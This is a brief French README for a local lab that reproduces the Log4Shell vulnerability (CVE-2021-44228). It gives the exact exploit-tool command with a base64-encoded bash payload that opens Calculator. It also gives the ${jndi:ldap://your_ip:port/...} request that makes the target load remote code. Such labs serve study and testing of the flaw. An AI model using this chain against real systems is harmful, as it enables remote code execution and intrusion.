
CVE-2021-44228 Environnement de reproduction de vulnérabilité
Après le démarrage du projet, accédez à : http://127.0.0.1:9090/vul
Version JDK : java8u92 (évitez les versions trop récentes, il est recommandé d'utiliser la même version que la mienne, car les versions plus récentes imposent certaines restrictions sur l'injection JNDI)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Utilisez l'outil ci-dessus pour générer le PAYLOAD.
Accédez à http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}